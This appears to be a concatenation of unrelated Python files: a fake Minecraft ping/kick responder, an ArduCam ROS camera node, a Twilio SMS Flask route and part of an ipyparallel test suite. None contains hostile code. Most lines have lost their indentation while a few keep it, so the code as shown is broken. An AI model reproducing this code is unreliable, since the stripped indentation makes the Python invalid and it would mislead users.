self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.ip = ip
self.port = port
self.motd = motd
self.version_text = version_text
self.kick_message = kick_message
self.samples = samples
self.server_icon = server_icon
self.logger = logger
self.show_hostname = show_hostname
self.player_max = player_max
self.player_online = player_online
self.protocol = protocol
def on_new_client(self, client_socket, addr):
data = client_socket.recv(1024)
client_ip = addr[0]
fqdn = socket.getfqdn(client_ip)
if self.show_hostname and client_ip != fqdn:
client_ip = fqdn + "/" + client_ip
try:
(length, i) = byte_utils.read_varint(data, 0)
(packetID, i) = byte_utils.read_varint(data, i)
if packetID == 0:
(version, i) = byte_utils.read_varint(data, i)
(ip, i) = byte_utils.read_utf(data, i)
ip = ip.replace('\x00', '').replace("\r", "\\r").replace("\t", "\\t").replace("\n", "\\n")
is_using_fml = False
if ip.endswith("FML"):
is_using_fml = True
ip = ip[:-3]
(port, i) = byte_utils.read_ushort(data, i)
(state, i) = byte_utils.read_varint(data, i)
if state == 1:
self.logger.info(("[%s:%s] Received client " + ("(using ForgeModLoader) " if is_using_fml else "") +
"ping packet (%s:%s).") % (client_ip, addr[1], ip, port))
motd = {}
motd["version"] = {}
motd["version"]["name"] = self.version_text
motd["version"]["protocol"] = self.protocol
motd["players"] = {}
motd["players"]["max"] = self.player_max
motd["players"]["online"] = self.player_online
motd["players"]["sample"] = []
for sample in self.samples:
motd["players"]["sample"].append({"name": sample, "id": str(uuid.uuid4())})
motd["description"] = {"text": self.motd}
if self.server_icon and len(self.server_icon) > 0:
motd["favicon"] = self.server_icon
self.write_response(client_socket, json.dumps(motd))
elif state == 2:
name = ""
if len(data) != i:
(some_int, i) = byte_utils.read_varint(data, i)
(some_int, i) = byte_utils.read_varint(data, i)
(name, i) = byte_utils.read_utf(data, i)
self.logger.info(
("[%s:%s] " + (name + " t" if len(name) > 0 else "T") + "ries to connect to the server " +
("(using ForgeModLoader) " if is_using_fml else "") + "(%s:%s).")
% (client_ip, addr[1], ip, port))
self.write_response(client_socket, json.dumps({"text": self.kick_message}))
else:
self.logger.info(
"[%s:%d] Tried to request a login/ping with an unknown state: %d" % (client_ip, addr[1], state))
            elif packetID == 1:
                # Ping packet: echo the 8-byte payload back in a pong
                # packet (length 9 = 1-byte packet id + 8-byte payload).
                (payload, i) = byte_utils.read_long(data, i)
                response = bytearray()
                byte_utils.write_varint(response, 9)
                byte_utils.write_varint(response, 1)
                response.extend(payload.to_bytes(8, byteorder='big', signed=True))
                client_socket.sendall(response)
self.logger.info("[%s:%d] Responded with pong packet." % (client_ip, addr[1]))
else:
self.logger.warning("[%s:%d] Sent an unexpected packet: %d" % (client_ip, addr[1], packetID))
except (TypeError, IndexError):
self.logger.warning("[%s:%s] Received invalid data (%s)" % (client_ip, addr[1], data))
return
def write_response(self, client_socket, response):
response_array = bytearray()
byte_utils.write_varint(response_array, 0)
byte_utils.write_utf(response_array, response)
length = bytearray()
byte_utils.write_varint(length, len(response_array))
client_socket.sendall(length)
client_socket.sendall(response_array)
def start(self):
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.ip, self.port))
self.sock.settimeout(5000)
self.sock.listen(30)
self.logger.info("Server started on %s:%s! Waiting for incoming connections..." % (self.ip, self.port))
while 1:
(client, address) = self.sock.accept()
Thread(target=self.on_new_client, daemon=True, args=(client, address,)).start()
def close(self):
self.sock.close()
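# ----------------------------------------------------------------------
# For reference, a minimal sketch of the VarInt codec this server relies
# on (an assumption about byte_utils, which is not shown here: the
# standard Minecraft VarInt -- 7 data bits per byte, with the high bit
# set while more bytes follow):
def _read_varint_sketch(data, offset):
    # Returns (value, new_offset); rejects inputs longer than 5 bytes.
    result = 0
    for shift in range(0, 35, 7):
        byte = data[offset]
        offset += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, offset
    raise ValueError("VarInt is too big")
def _write_varint_sketch(buffer, value):
    # Appends the encoded value to a bytearray, low 7 bits first.
    while True:
        byte = value & 0x7F
        value >>= 7
        buffer.append(byte | (0x80 if value else 0))
        if not value:
            return
# ----------------------------------------------------------------------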
|
arducam_long.py
|
#!/usr/bin/env python
import sys
import os
import time
import cv2
import threading
import numpy as np
import signal
import json
import ArducamSDK
import rospy
from sensor_msgs.msg import CompressedImage, Image
from cv_bridge import CvBridge, CvBridgeError
from std_msgs.msg import String
global cfg,handle,running,Width,Height,save_flag,color_mode,ct_lock,rt_lock,count1
global logging, logname,loghandle,loghandle1,logpath, log_stepsize, curr_logging, max_num_frames_log, curr_num_frames_log
count1 = 0
ct_lock = threading.Lock()
rt_lock = threading.Lock()
logging = False
logname = "unknown"
logpath = "/home/niggi/Desktop/arducam_logs"
log_stepsize = 10
curr_logging = False
max_num_frames_log=5
curr_num_frames_log=0
running = True
save_flag = False
cfg = {}
handle = {}
global COLOR_BayerGB2BGR,COLOR_BayerRG2BGR,COLOR_BayerGR2BGR,COLOR_BayerBG2BGR
COLOR_BayerBG2BGR = 46
COLOR_BayerGB2BGR = 47
COLOR_BayerRG2BGR = 48
COLOR_BayerGR2BGR = 49
def configBoard(fileNodes):
global handle
for i in range(0,len(fileNodes)):
fileNode = fileNodes[i]
buffs = []
command = fileNode[0]
value = fileNode[1]
index = fileNode[2]
buffsize = fileNode[3]
for j in range(0,len(fileNode[4])):
buffs.append(int(fileNode[4][j],16))
ArducamSDK.Py_ArduCam_setboardConfig(handle,int(command,16),int(value,16),int(index,16),int(buffsize,16),buffs)
pass
def JPGToMat(data,datasize):
image = np.frombuffer(data,np.uint8,count = datasize)
return cv2.imdecode(image,cv2.IMREAD_ANYCOLOR)
def YUVToMat(data):
global Width,Height
image = np.frombuffer(data, np.uint8).reshape( Height,Width , 2 )
return cv2.cvtColor(image,cv2.COLOR_YUV2BGR_YUYV)
def RGB565ToMat(data):
global Width,Height
arr = np.frombuffer(data,dtype=np.uint16).astype(np.uint32)
arr = ((arr & 0xFF00) >> 8) + ((arr & 0x00FF) << 8)
arr = 0xFF000000 + ((arr & 0xF800) << 8) + ((arr & 0x07E0) << 5) + ((arr & 0x001F) << 3)
arr.dtype = np.uint8
    image = arr.reshape(Height,Width,4)
    return cv2.flip(image,0)
def writeSensorRegs(fileNodes):
global handle
for i in range(0,len(fileNodes)):
fileNode = fileNodes[i]
regAddr = int(fileNode[0],16)
val = int(fileNode[1],16)
ArducamSDK.Py_ArduCam_writeSensorReg(handle,regAddr,val)
pass
def writeSingleSensorReg(reg_str,val_str):
global handle
regAddr = int(reg_str,16)
val = int(val_str,16)
ArducamSDK.Py_ArduCam_writeSensorReg(handle,regAddr,val)
    #check if value successfully changed:
    if (val == ArducamSDK.Py_ArduCam_readSensorReg(handle,regAddr)[1]):
        print ("SUCCESSFULLY CHANGED" + ' ' + hex(regAddr) + ' ' + "TO" + ' ' + hex(val))
    else:
        rospy.logerr ("WRITING COMMAND NOT SUCCESSFUL")
def readSingleSensorReg(reg_str):
global handle
regAddr = int(reg_str,16)
val = ArducamSDK.Py_ArduCam_readSensorReg(handle,regAddr)[1]
print ("VALUE OF" + ' ' + hex(regAddr) + ' ' + "IS" + ' ' + hex(val))
def camera_initFromFile(fileName):
    global cfg,handle,Width,Height,color_mode
    #load config file
    config = json.load(open(fileName,"r"))
camera_parameter = config["camera_parameter"]
Width = int(camera_parameter["SIZE"][0])
Height = int(camera_parameter["SIZE"][1])
BitWidth = camera_parameter["BIT_WIDTH"]
FmtMode = int(camera_parameter["FORMAT"][0])
color_mode = (int)(camera_parameter["FORMAT"][1])
print "color mode",color_mode
I2CMode = camera_parameter["I2C_MODE"]
SensorShipAddr = int(camera_parameter["I2C_ADDR"],16)
cfg = {"u32CameraType":0x4D091031,
"u32Width":Width,"u32Height":Height,
"u32UsbVersion":0,
"u8PixelBytes":1,
"u16Vid":0,
"u32Size":0,
"u8PixelBits":BitWidth,
"u32SensorShipAddr":SensorShipAddr,
"emI2cMode":I2CMode,
"emImageFmtMode":FmtMode }
#ret,handle,rtn_cfg = ArducamSDK.Py_ArduCam_open(cfg,0)
ret,handle,rtn_cfg = ArducamSDK.Py_ArduCam_autoopen(cfg)
if ret == 0:
#ArducamSDK.Py_ArduCam_writeReg_8_8(handle,0x46,3,0x00)
usb_version = rtn_cfg['u32UsbVersion']
#print "USB VERSION:",usb_version
#config board param
configBoard(config["board_parameter"])
if usb_version == ArducamSDK.USB_1 or usb_version == ArducamSDK.USB_2:
configBoard(config["board_parameter_dev2"])
if usb_version == ArducamSDK.USB_3:
configBoard(config["board_parameter_dev3_inf3"])
if usb_version == ArducamSDK.USB_3_2:
configBoard(config["board_parameter_dev3_inf2"])
writeSensorRegs(config["register_parameter"])
if usb_version == ArducamSDK.USB_3:
writeSensorRegs(config["register_parameter_dev3_inf3"])
if usb_version == ArducamSDK.USB_3_2:
writeSensorRegs(config["register_parameter_dev3_inf2"])
rtn_val,datas = ArducamSDK.Py_ArduCam_readUserData(handle,0x400-16, 16)
print "Serial: %c%c%c%c-%c%c%c%c-%c%c%c%c"%(datas[0],datas[1],datas[2],datas[3],
datas[4],datas[5],datas[6],datas[7],
datas[8],datas[9],datas[10],datas[11])
return True
else:
print "open fail"
return False
pass
def captureImage_thread():
global handle,running, ct_lock, count1
rtn_val = ArducamSDK.Py_ArduCam_beginCaptureImage(handle)
if rtn_val != 0:
print "Error beginning capture, rtn_val = ",rtn_val
running = False
return
else:
print "Capture began, rtn_val = ",rtn_val
while (running and (not rospy.is_shutdown())):
#print "capture"
if count1==0:
if ct_lock.acquire(False):
print "capture image", count1
rtn_val = ArducamSDK.Py_ArduCam_captureImage(handle)
count1 = count1 +1
if rtn_val != 0:
print "Error capture image, rtn_val = ",rtn_val
break
else:
time.sleep(0.005)
ct_lock.release()
else:
time.sleep(0.005)
else:
time.sleep(0.005)
running = False
ArducamSDK.Py_ArduCam_endCaptureImage(handle)
def readImage_thread(publisher_img):
global handle,running,Width,Height,save_flag,cfg,color_mode, rt_lock, count1
global COLOR_BayerGB2BGR,COLOR_BayerRG2BGR,COLOR_BayerGR2BGR,COLOR_BayerBG2BGR
global logpath,loghandle,log_stepsize,logging, curr_logging, loghandle1, max_num_frames_log, curr_num_frames_log
bridge = CvBridge()
count = 0
totalFrame = 0
time0 = time.time()
time1 = time.time()
data = {}
# DEMO WINDOW DECISION!!!
cv2.namedWindow("ArduCam Demo",1)
if not os.path.exists("images1"):
os.makedirs("images1")
print "CIAO"
if not os.path.exists(logpath):
oldmask = os.umask(000)
os.makedirs(logpath,0777)
print "CREATING DIRECTORY"
while running:
if count1 == 1:
if rt_lock.acquire(False):
print "read image", count1
display_time = time.time()
if ArducamSDK.Py_ArduCam_availableImage(handle) > 0:
rtn_val,data,rtn_cfg = ArducamSDK.Py_ArduCam_readImage(handle)
datasize = rtn_cfg['u32Size']
if rtn_val != 0:
print "read data fail!"
continue
if datasize == 0:
continue
image = None
emImageFmtMode = cfg['emImageFmtMode']
if emImageFmtMode == ArducamSDK.FORMAT_MODE_JPG:
image = JPGToMat(data,datasize)
if emImageFmtMode == ArducamSDK.FORMAT_MODE_YUV:
image = YUVToMat(data)
if emImageFmtMode == ArducamSDK.FORMAT_MODE_RGB:
image = RGB565ToMat(data)
if emImageFmtMode == ArducamSDK.FORMAT_MODE_MON:
image = np.frombuffer(data, np.uint8).reshape( Height,Width , 1 )
if logging:
curr_logging = True
#save ENTIRE IMAGE!!!
np.save(loghandle1, image)
prev_bin = 0
for i in range (log_stepsize,255,log_stepsize):
#print i
#print bigger0-bigger20
smaller = (image < i).sum()
loghandle.write(str(smaller-prev_bin) + ',' + ' ')
prev_bin = smaller
#last one:
smaller = (image < 256).sum()
loghandle.write(str(smaller - prev_bin) + ';' + '\n')
                            curr_num_frames_log += 1
                            if curr_num_frames_log > max_num_frames_log:
                                logging = False
                                loghandle.close()
                                loghandle1.close()
                                print "Logging to " + logname + " has ended"
                                curr_num_frames_log = 0
                                curr_logging = False
if emImageFmtMode == ArducamSDK.FORMAT_MODE_RAW:
image = np.frombuffer(data, np.uint8).reshape( Height,Width , 1 )
if color_mode == 0:
image = cv2.cvtColor(image,COLOR_BayerRG2BGR)
if color_mode == 1:
image = cv2.cvtColor(image,COLOR_BayerGR2BGR)
if color_mode == 2:
image = cv2.cvtColor(image,COLOR_BayerGB2BGR)
if color_mode == 3:
image = cv2.cvtColor(image,COLOR_BayerBG2BGR)
                        if color_mode < 0 or color_mode > 3:
image = cv2.cvtColor(image,COLOR_BayerGB2BGR)
#HERE ONLY OUTPUTS CURRENT FPS -> IS THIS REALLY NEEDED?
time1 = time.time()
if time1 - time0 >= 1:
#print "%s %d %s\n"%("fps:",count,"/s")
print (time1 - time0)
count = 0
time0 = time1
count += 1
# POTENTIALLY SAVES THE IMAGE -> NEEDED?!
if save_flag:
cv2.imwrite("images/image%d.jpg"%totalFrame,image)
totalFrame += 1
                        # Decide if you want to resize or not here!!
                        # ATTENTION: THIS INFLUENCES THE RESULTING FRAME RATE
                        #image = cv2.resize(image,(640,480),interpolation = cv2.INTER_LINEAR)
                        # INCLUDE FCT IN THE FUTURE FOR WHICH PART OF THE IMAGE I WANT TO SEE,...
                        # CROPPING IS HERE:
                        #image = image[0:640, 0:480]
                        # DECIDE IF THE NORMAL DEMO WINDOW SHOULD OPEN OR NOT
                        # IN LONG EXPOSURE SCENARIO THIS MAKES NO BIG DIFFERENCE!!!
cv2.imshow("ArduCam Demo",image)
cv2.waitKey(10)
#NEWLY INSERTED ROS PUBLISHER
try:
publisher_img.publish(bridge.cv2_to_imgmsg(image,'mono8'))
except CvBridgeError as e:
print(e)
#publisher_img.publish(image)
# assuming: del deletes the pic,...
#ArducamSDK.Py_ArduCam_del(handle)
ArducamSDK.Py_ArduCam_flush(handle)
#print "------------------------display time:",(time.time() - display_time)
else:
                        time.sleep(0.001)
count1 = count1 - 1
rt_lock.release()
else:
time.sleep(0.001)
else:
time.sleep(0.001)
def register_changer():
rospy.Subscriber("change_reg", String, callback_change)
# spin() simply keeps python from exiting until this node is stopped
def callback_change(data):
#rospy.loginfo(rospy.get_caller_id() + "I heard %s", data.data)
split_str = data.data.split()
if (len(split_str)==2):
writeSingleSensorReg(split_str[0],split_str[1])
else:
print ("INVALID WRITING STATEMENT")
def register_reader():
rospy.Subscriber("read_reg", String, callback_read)
# spin() simply keeps python from exiting until this node is stopped
def callback_read(data):
#rospy.loginfo(rospy.get_caller_id() + "I heard %s", data.data)
split_str = data.data.split()
if (len(split_str)==1):
readSingleSensorReg(split_str[0])
else:
print ("INVALID READING STATEMENT")
def logging_reader():
rospy.Subscriber("logging_topic", String, callback_log)
# spin() simply keeps python from exiting until this node is stopped
def callback_log(data):
global logging, logname,loghandle, logpath,log_stepsize,curr_logging,loghandle1
#rospy.loginfo(rospy.get_caller_id() + "I heard %s", data.data)
split_str = data.data.split()
if((logging == True) and (split_str[0] == "false")):
quitting = True
while quitting:
if curr_logging:
time.sleep(0.1)
else:
quitting = False
logging = False
loghandle.close()
loghandle1.close()
        print "Logging to " + logname + " has ended"
if((logging == False) and (split_str[0] == "true")):
logname = split_str[1]
if os.path.isfile(logpath + "/" + logname + ".txt"):
rospy.logwarn("File already exists! No log started")
else:
logging = True
loghandle = open(logpath + "/" + logname + ".txt", 'w')
            loghandle1 = open(logpath + "/" + logname + "_raw.bin", "wb")
            print "Start logging to " + logname
loghandle.write("stepsize" + ' ' + str(log_stepsize) + ';' + '\n')
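# Message format on the "logging_topic" (inferred from the parsing above):
#   "true <logname>"  starts a log to <logname>.txt and <logname>_raw.bin
#   "false"           stops the current log
# e.g. from another node (hypothetical, assuming the same namespace):
#   pub = rospy.Publisher('logging_topic', String, queue_size=1)
#   pub.publish(String(data='true mylog'))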
# dummy class which handles what happens on ROS shutdown!!!
class onRosShutdown(object):
def __init__(self):
pass
def onShutdown(self):
rospy.loginfo('Shutting down Arducam Image Capture due to ROS ending!!!')
def showHelp():
print " usage: sudo python ArduCam_Py_Demo.py <path/config-file-name> \
\n\n example: sudo python ArduCam_Py_Demo.py ../Config/AR0134_960p_Color.yml \
\n\n While the program is running, you can press the following buttons in the terminal: \
\n\n 's' + Enter:Save the image to the images folder. \
\n\n 'c' + Enter:Stop saving images. \
\n\n 'q' + Enter:Stop running the program. \
\n\n"
def sigint_handler(signum, frame):
global running,handle
running = False
exit()
signal.signal(signal.SIGINT, sigint_handler)
signal.signal(signal.SIGHUP, sigint_handler)
signal.signal(signal.SIGTERM, sigint_handler)
if __name__ == "__main__":
rospy.init_node('arducam_node', anonymous=False)
publisher_img = rospy.Publisher("/arducam_node/image", Image, queue_size=1)
# READING THE CONFIG FILE HERE from the launchfile!!!
config_file_name = rospy.get_param("~cam_model", "")
#print config_file_name
#print os.path.exists(config_file_name)
if not os.path.exists(config_file_name):
print "Config file does not exist."
exit()
if camera_initFromFile(config_file_name):
ct = threading.Thread(target=captureImage_thread)
rt = threading.Thread(target=readImage_thread,args=(publisher_img,))
ct.setDaemon(True)
rt.setDaemon(True)
ct.start()
rt.start()
register_changer()
register_reader()
logging_reader()
handleShutdown = onRosShutdown()
rospy.on_shutdown(handleShutdown.onShutdown)
rospy.spin()
while running:
input_kb = str(sys.stdin.readline()).strip("\n")
print ("HELLO I AM HERE 1")
if input_kb == 'q' or input_kb == 'Q':
running = False
if input_kb == 's' or input_kb == 'S':
save_flag = True
if input_kb == 'c' or input_kb == 'C':
save_flag = False
ct.join()
rt.join()
print ("HELLO I AM HERE 2")
#pause
#ArducamSDK.Py_ArduCam_writeReg_8_8(handle,0x46,3,0x40)
rtn_val = ArducamSDK.Py_ArduCam_close(handle)
if rtn_val == 0:
print "device close success!"
else:
print "device close fail!"
#os.system("pause")
|
callme.py
|
import datetime
import os
import queue
import random
import threading
import time
from flask import jsonify
from flask import request
from server import app
from server.routes import prometheus
from twilio.rest import Client
from server.config import db
# Initialize the Twilio client
#
# Your Account Sid and Auth Token from twilio.com/console
# and set the environment variables. See http://twil.io/secure
account_sid = os.environ.get('TWILIO_ACCOUNT_SID')
auth_token = os.environ.get('TWILIO_AUTH_TOKEN')
from_phone_number = os.environ.get('TWILIO_PHONE_NUMBER')
sleep_min = int(os.environ.get('CALL_SLEEP_MIN', 1))
sleep_max = int(os.environ.get('CALL_SLEEP_MAX', 10))
client = None
if account_sid and auth_token and from_phone_number:
client = Client(account_sid, auth_token)
# Queue and tasks for calling to add random wait times between calls
q = queue.Queue()
def caller():
while True:
callee = q.get()
print('Begin calling:', callee)
phone = callee[0]
msg = callee[1]
posted = callee[2]
call_via_twilio(phone, msg)
print('Done texting "', msg, '" to', phone)
db.insert_call_me(
{
'PHONE': phone[1:],
'POSTED': posted,
'CALLED': datetime.datetime.now()
}
)
s = random.randint(sleep_min, sleep_max)
print('Wait ', s, 'seconds')
time.sleep(s)
q.task_done()
threading.Thread(target=caller, daemon=True).start()
# Random initial text message
hellos = [
'Hi there',
'Howdy',
'Hi',
'Hey'
]
@app.route("/api/v1/callme", methods=['POST'])
@prometheus.track_requests
def callme():
"""callme numbers route"""
call_these = request.get_json(force=True)
for i in call_these:
name = i.get('name')
digits = ''.join(n for n in i['phone'] if n.isdigit())
prefix = '+1' if len(digits) == 10 else '+'
phone = prefix + digits
message = i.get('message', random.choice(hellos))
print("POST", name, "at", phone, "message:", message)
q.put((phone, message, datetime.datetime.now()))
state = {"status": "Accepted"}
return jsonify(state), 202
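# Example request against this route (hypothetical host/port; the handler
# expects a JSON list of objects with "phone" plus optional "name" and
# "message" keys):
#   import requests
#   requests.post('http://localhost:5000/api/v1/callme',
#                 json=[{'name': 'Ada', 'phone': '555-123-4567', 'message': 'Hi'}])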
def call_via_twilio(to_phone_number, message):
if not client:
print("--> Skipping Twilio call because it is not configured. <--")
return
try:
message = client.messages.create(
to=to_phone_number,
from_=from_phone_number,
body=message)
print("Twilio message SID:", message.sid)
print("Twilio message:", message)
except Exception as e:
print(e)
|
test_client.py
|
"""Tests for parallel client.py"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import division
from concurrent.futures import Future
from datetime import datetime
import os
from threading import Thread
import time
from tornado.concurrent import Future as TornadoFuture
from IPython import get_ipython
from ipyparallel.client import client as clientmod
from ipyparallel import error, AsyncHubResult, DirectView, Reference
from ipyparallel.util import utc
from .clienttest import ClusterTestCase, wait, add_engines, skip_without
def setup():
add_engines(4, total=True)
class TestClient(ClusterTestCase):
def test_ids(self):
n = len(self.client.ids)
self.add_engines(2)
self.assertEqual(len(self.client.ids), n+2)
def test_iter(self):
self.minimum_engines(4)
engine_ids = [ view.targets for view in self.client ]
self.assertEqual(engine_ids, self.client.ids)
def test_view_indexing(self):
"""test index access for views"""
self.minimum_engines(4)
targets = self.client._build_targets('all')[-1]
v = self.client[:]
self.assertEqual(v.targets, targets)
t = self.client.ids[2]
v = self.client[t]
self.assertTrue(isinstance(v, DirectView))
self.assertEqual(v.targets, t)
t = self.client.ids[2:4]
v = self.client[t]
self.assertTrue(isinstance(v, DirectView))
self.assertEqual(v.targets, t)
v = self.client[::2]
self.assertTrue(isinstance(v, DirectView))
self.assertEqual(v.targets, targets[::2])
v = self.client[1::3]
self.assertTrue(isinstance(v, DirectView))
self.assertEqual(v.targets, targets[1::3])
v = self.client[:-3]
self.assertTrue(isinstance(v, DirectView))
self.assertEqual(v.targets, targets[:-3])
v = self.client[-1]
self.assertTrue(isinstance(v, DirectView))
self.assertEqual(v.targets, targets[-1])
self.assertRaises(TypeError, lambda : self.client[None])
def test_lbview_targets(self):
"""test load_balanced_view targets"""
v = self.client.load_balanced_view()
self.assertEqual(v.targets, None)
v = self.client.load_balanced_view(-1)
self.assertEqual(v.targets, [self.client.ids[-1]])
v = self.client.load_balanced_view('all')
self.assertEqual(v.targets, None)
def test_dview_targets(self):
"""test direct_view targets"""
v = self.client.direct_view()
self.assertEqual(v.targets, 'all')
v = self.client.direct_view('all')
self.assertEqual(v.targets, 'all')
v = self.client.direct_view(-1)
self.assertEqual(v.targets, self.client.ids[-1])
def test_lazy_all_targets(self):
"""test lazy evaluation of rc.direct_view('all')"""
v = self.client.direct_view()
self.assertEqual(v.targets, 'all')
def double(x):
return x*2
seq = list(range(100))
ref = [ double(x) for x in seq ]
# add some engines, which should be used
self.add_engines(1)
n1 = len(self.client.ids)
# simple apply
r = v.apply_sync(lambda : 1)
self.assertEqual(r, [1] * n1)
# map goes through remotefunction
r = v.map_sync(double, seq)
self.assertEqual(r, ref)
# add a couple more engines, and try again
self.add_engines(2)
n2 = len(self.client.ids)
self.assertNotEqual(n2, n1)
# apply
r = v.apply_sync(lambda : 1)
self.assertEqual(r, [1] * n2)
# map
r = v.map_sync(double, seq)
self.assertEqual(r, ref)
def test_targets(self):
"""test various valid targets arguments"""
build = self.client._build_targets
ids = self.client.ids
idents,targets = build(None)
self.assertEqual(ids, targets)
def test_clear(self):
"""test clear behavior"""
self.minimum_engines(2)
v = self.client[:]
v.block=True
v.push(dict(a=5))
v.pull('a')
id0 = self.client.ids[-1]
self.client.clear(targets=id0, block=True)
a = self.client[:-1].get('a')
self.assertRaisesRemote(NameError, self.client[id0].get, 'a')
self.client.clear(block=True)
for i in self.client.ids:
self.assertRaisesRemote(NameError, self.client[i].get, 'a')
def test_get_result(self):
"""test getting results from the Hub."""
c = clientmod.Client(profile='iptest')
t = c.ids[-1]
ar = c[t].apply_async(wait, 1)
# give the monitor time to notice the message
time.sleep(.25)
ahr = self.client.get_result(ar.msg_ids[0], owner=False)
self.assertIsInstance(ahr, AsyncHubResult)
self.assertEqual(ahr.get(), ar.get())
ar2 = self.client.get_result(ar.msg_ids[0])
self.assertNotIsInstance(ar2, AsyncHubResult)
self.assertEqual(ahr.get(), ar2.get())
ar3 = self.client.get_result(ar2)
self.assertEqual(ar3.msg_ids, ar2.msg_ids)
ar3 = self.client.get_result([ar2])
self.assertEqual(ar3.msg_ids, ar2.msg_ids)
c.close()
def test_get_execute_result(self):
"""test getting execute results from the Hub."""
c = clientmod.Client(profile='iptest')
t = c.ids[-1]
cell = '\n'.join([
'import time',
'time.sleep(0.25)',
'5'
])
ar = c[t].execute("import time; time.sleep(1)", silent=False)
# give the monitor time to notice the message
time.sleep(.25)
ahr = self.client.get_result(ar.msg_ids[0], owner=False)
self.assertIsInstance(ahr, AsyncHubResult)
self.assertEqual(ahr.get().execute_result, ar.get().execute_result)
ar2 = self.client.get_result(ar.msg_ids[0])
self.assertNotIsInstance(ar2, AsyncHubResult)
self.assertEqual(ahr.get(), ar2.get())
c.close()
def test_ids_list(self):
"""test client.ids"""
ids = self.client.ids
self.assertEqual(ids, self.client._ids)
self.assertFalse(ids is self.client._ids)
ids.remove(ids[-1])
self.assertNotEqual(ids, self.client._ids)
def test_queue_status(self):
ids = self.client.ids
id0 = ids[0]
qs = self.client.queue_status(targets=id0)
self.assertTrue(isinstance(qs, dict))
self.assertEqual(sorted(qs.keys()), ['completed', 'queue', 'tasks'])
allqs = self.client.queue_status()
self.assertTrue(isinstance(allqs, dict))
intkeys = list(allqs.keys())
intkeys.remove('unassigned')
print("intkeys", intkeys)
intkeys = sorted(intkeys)
ids = self.client.ids
print("client.ids", ids)
ids = sorted(self.client.ids)
self.assertEqual(intkeys, ids)
unassigned = allqs.pop('unassigned')
for eid,qs in allqs.items():
self.assertTrue(isinstance(qs, dict))
self.assertEqual(sorted(qs.keys()), ['completed', 'queue', 'tasks'])
def test_shutdown(self):
ids = self.client.ids
id0 = ids[-1]
pid = self.client[id0].apply_sync(os.getpid)
self.client.shutdown(id0, block=True)
for i in range(150):
# give the engine 15 seconds to die
if id0 not in self.client.ids:
break
time.sleep(0.1)
self.assertNotIn(id0, self.client.ids)
self.assertRaises(IndexError, lambda : self.client[id0])
def test_result_status(self):
pass
# to be written
def test_db_query_dt(self):
"""test db query by date"""
hist = self.client.hub_history()
middle = self.client.db_query({'msg_id' : hist[len(hist)//2]})[0]
tic = middle['submitted']
before = self.client.db_query({'submitted' : {'$lt' : tic}})
after = self.client.db_query({'submitted' : {'$gte' : tic}})
self.assertEqual(len(before)+len(after),len(hist))
for b in before:
self.assertTrue(b['submitted'] < tic)
for a in after:
self.assertTrue(a['submitted'] >= tic)
same = self.client.db_query({'submitted' : tic})
for s in same:
self.assertTrue(s['submitted'] == tic)
def test_db_query_keys(self):
"""test extracting subset of record keys"""
found = self.client.db_query({'msg_id': {'$ne' : ''}},keys=['submitted', 'completed'])
for rec in found:
self.assertEqual(set(rec.keys()), set(['msg_id', 'submitted', 'completed']))
def test_db_query_default_keys(self):
"""default db_query excludes buffers"""
found = self.client.db_query({'msg_id': {'$ne' : ''}})
for rec in found:
keys = set(rec.keys())
self.assertFalse('buffers' in keys, "'buffers' should not be in: %s" % keys)
self.assertFalse('result_buffers' in keys, "'result_buffers' should not be in: %s" % keys)
def test_db_query_msg_id(self):
"""ensure msg_id is always in db queries"""
found = self.client.db_query({'msg_id': {'$ne' : ''}},keys=['submitted', 'completed'])
for rec in found:
self.assertTrue('msg_id' in rec.keys())
found = self.client.db_query({'msg_id': {'$ne' : ''}},keys=['submitted'])
for rec in found:
self.assertTrue('msg_id' in rec.keys())
found = self.client.db_query({'msg_id': {'$ne' : ''}},keys=['msg_id'])
for rec in found:
self.assertTrue('msg_id' in rec.keys())
def test_db_query_get_result(self):
"""pop in db_query shouldn't pop from result itself"""
self.client[:].apply_sync(lambda : 1)
found = self.client.db_query({'msg_id': {'$ne' : ''}})
rc2 = clientmod.Client(profile='iptest')
# If this bug is not fixed, this call will hang:
ar = rc2.get_result(self.client.history[-1])
ar.wait(2)
self.assertTrue(ar.ready())
ar.get()
rc2.close()
def test_db_query_in(self):
"""test db query with '$in','$nin' operators"""
hist = self.client.hub_history()
even = hist[::2]
odd = hist[1::2]
recs = self.client.db_query({ 'msg_id' : {'$in' : even}})
found = [ r['msg_id'] for r in recs ]
self.assertEqual(set(even), set(found))
recs = self.client.db_query({ 'msg_id' : {'$nin' : even}})
found = [ r['msg_id'] for r in recs ]
self.assertEqual(set(odd), set(found))
def test_hub_history(self):
hist = self.client.hub_history()
recs = self.client.db_query({ 'msg_id' : {"$ne":''}})
recdict = {}
for rec in recs:
recdict[rec['msg_id']] = rec
latest = datetime(1984,1,1).replace(tzinfo=utc)
for msg_id in hist:
rec = recdict[msg_id]
newt = rec['submitted']
self.assertTrue(newt >= latest)
latest = newt
ar = self.client[-1].apply_async(lambda : 1)
ar.get()
time.sleep(0.25)
self.assertEqual(self.client.hub_history()[-1:],ar.msg_ids)
    def _wait_for_idle(self):
        """wait for the cluster to become idle, according to everyone."""
rc = self.client
# step 0. wait for local results
# this should be sufficient 99% of the time.
rc.wait(timeout=5)
# step 1. wait for all requests to be noticed
# timeout 5s, polling every 100ms
msg_ids = set(rc.history)
hub_hist = rc.hub_history()
for i in range(50):
if msg_ids.difference(hub_hist):
time.sleep(0.1)
hub_hist = rc.hub_history()
else:
break
self.assertEqual(len(msg_ids.difference(hub_hist)), 0)
# step 2. wait for all requests to be done
# timeout 5s, polling every 100ms
qs = rc.queue_status()
for i in range(50):
if qs['unassigned'] or any(qs[eid]['tasks'] + qs[eid]['queue'] for eid in qs if eid != 'unassigned'):
time.sleep(0.1)
qs = rc.queue_status()
else:
break
# ensure Hub up to date:
self.assertEqual(qs['unassigned'], 0)
for eid in [ eid for eid in qs if eid != 'unassigned' ]:
self.assertEqual(qs[eid]['tasks'], 0)
self.assertEqual(qs[eid]['queue'], 0)
def test_resubmit(self):
def f():
import random
return random.random()
v = self.client.load_balanced_view()
ar = v.apply_async(f)
r1 = ar.get(1)
# give the Hub a chance to notice:
self._wait_for_idle()
ahr = self.client.resubmit(ar.msg_ids)
r2 = ahr.get(1)
self.assertFalse(r1 == r2)
def test_resubmit_chain(self):
"""resubmit resubmitted tasks"""
